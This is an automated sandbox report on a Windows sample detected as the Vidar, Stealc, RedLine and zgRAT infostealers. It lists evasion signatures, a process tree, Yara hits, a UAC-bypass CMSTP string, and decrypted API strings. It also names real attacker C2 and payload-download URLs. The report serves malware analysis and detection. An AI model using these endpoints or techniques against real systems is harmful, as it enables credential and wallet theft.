Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wxfSIz4PAi.exe

Overview

General Information

Sample name:wxfSIz4PAi.exe
renamed because original name is a hash value
Original sample name:0a7871874dc7111b978e798f616211f9.exe
Analysis ID:1432361
MD5:0a7871874dc7111b978e798f616211f9
SHA1:5f020eefc6d5da7efecd31bd3911911169d99021
SHA256:209765690105250f9d48d09d6bf6c4bbe22668e38b7b7e400b703e27bec45057
Tags:32exe
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wxfSIz4PAi.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\wxfSIz4PAi.exe" MD5: 0A7871874DC7111B978E798F616211F9)
    • u5ek.0.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.0.exe" MD5: ACAAA65D3F174EBF3595E23522837B43)
      • cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • EGIJKEHCAK.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)
      • WerFault.exe (PID: 7952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 2220 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • run.exe (PID: 2652 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
      • cmd.exe (PID: 3488 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 7824 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u5ek.3.exe (PID: 3428 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)
    • WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • run.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 8116 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 1816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\xtfkyJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\xtfkyJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\xtfkyMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
        • 0xb864a:$s14: keybd_event
        • 0xbf3b9:$v1_1: grabber@
        • 0xb921c:$v1_2: <BrowserProfile>k__
        • 0xb9c95:$v1_3: <SystemHardwares>k__
        • 0xb9d54:$v1_5: <ScannedWallets>k__
        • 0xb9de4:$v1_6: <DicrFiles>k__
        • 0xb9dc0:$v1_7: <MessageClientFiles>k__
        • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
        • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
        • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
        • 0xba233:$v1_8: <ScanVPN>k__BackingField
        • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
        • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
        C:\Users\user\AppData\Local\Temp\jwjqeqxJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          C:\Users\user\AppData\Local\Temp\jwjqeqxJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
            • 0x1650:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
            00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                00000000.00000003.1819490382.00000000071F2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
                  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
                  Click to see the 34 entries
                  SourceRuleDescriptionAuthorStrings
                  1.3.u5ek.0.exe.5b60000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    1.3.u5ek.0.exe.5b60000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                      2.2.run.exe.26ccd5b.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        20.2.run.exe.3e1e15b.6.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                          2.2.run.exe.26ccd5b.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                          • 0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                          • 0x1d189:$s1: CoGetObject
                          • 0x1d0e2:$s2: Elevation:Administrator!new:
                          Click to see the 81 entries
                          No Sigma rule has matched
                          Timestamp:04/26/24-23:08:52.240583
                          SID:2856233
                          Source Port:49730
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-23:09:00.358800
                          SID:2051831
                          Source Port:80
                          Destination Port:49733
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-23:08:57.572292
                          SID:2044243
                          Source Port:49733
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-23:08:59.654524
                          SID:2044244
                          Source Port:49733
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-23:09:00.002826
                          SID:2051828
                          Source Port:80
                          Destination Port:49733
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-23:09:00.005433
                          SID:2044246
                          Source Port:49733
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://185.172.128.59/syncUpd.exeAvira URL Cloud: Label: malware
                          Source: http://185.172.128.228/ping.php?substr=twoAvira URL Cloud: Label: malware
                          Source: http://185.172.128.203/tiktok.exeAvira URL Cloud: Label: malware
                          Source: C:\Users\user\AppData\Local\Temp\jwjqeqxAvira: detection malicious, Label: HEUR/AGEN.1307453
                          Source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\jwjqeqxReversingLabs: Detection: 64%
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                          Source: C:\Users\user\AppData\Local\Temp\xtfkyReversingLabs: Detection: 64%
                          Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                          Source: wxfSIz4PAi.exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\jwjqeqxJoe Sandbox ML: detected
                          Source: wxfSIz4PAi.exeJoe Sandbox ML: detected
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetProcAddress
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: LoadLibraryA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: lstrcatA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: OpenEventA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateEventA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CloseHandle
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Sleep
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: VirtualFree
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetSystemInfo
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: VirtualAlloc
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HeapAlloc
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetComputerNameA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: lstrcpyA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetProcessHeap
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetCurrentProcess
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: lstrlenA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ExitProcess
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetSystemTime
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: advapi32.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: gdi32.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: user32.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: crypt32.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ntdll.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetUserNameA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateDCA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetDeviceCaps
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ReleaseDC
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sscanf
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: VMwareVMware
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HAL9TH
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: JohnDoe
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DISPLAY
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: http://185.172.128.76
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: /15f649199f40275b/
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: default10
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetFileAttributesA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GlobalLock
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HeapFree
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetFileSize
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GlobalSize
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: IsWow64Process
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Process32Next
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetLocalTime
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: FreeLibrary
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetVolumeInformationA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Process32First
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetLocaleInfoA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetModuleFileNameA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DeleteFileA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: FindNextFileA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: LocalFree
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: FindClose
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: LocalAlloc
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetFileSizeEx
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ReadFile
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SetFilePointer
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: WriteFile
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateFileA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: FindFirstFileA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CopyFileA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: VirtualProtect
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetLastError
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: lstrcpynA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: MultiByteToWideChar
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GlobalFree
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: WideCharToMultiByte
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GlobalAlloc
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: OpenProcess
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: TerminateProcess
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetCurrentProcessId
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: gdiplus.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ole32.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: bcrypt.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: wininet.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: shlwapi.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: shell32.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: psapi.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: rstrtmgr.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SelectObject
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BitBlt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DeleteObject
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateCompatibleDC
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdiplusStartup
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdiplusShutdown
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdipDisposeImage
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GdipFree
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CoUninitialize
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CoInitialize
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CoCreateInstance
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BCryptDecrypt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BCryptSetProperty
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BCryptDestroyKey
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetWindowRect
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetDesktopWindow
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetDC
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CloseWindow
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: wsprintfA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CharToOemW
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: wsprintfW
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RegQueryValueExA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RegEnumKeyExA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RegOpenKeyExA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RegCloseKey
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RegEnumValueA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CryptUnprotectData
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SHGetFolderPathA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ShellExecuteExA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: InternetOpenUrlA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: InternetConnectA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: InternetCloseHandle
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: InternetOpenA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HttpSendRequestA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HttpOpenRequestA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: InternetReadFile
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: InternetCrackUrlA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: StrCmpCA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: StrStrA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: StrCmpCW
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: PathMatchSpecA
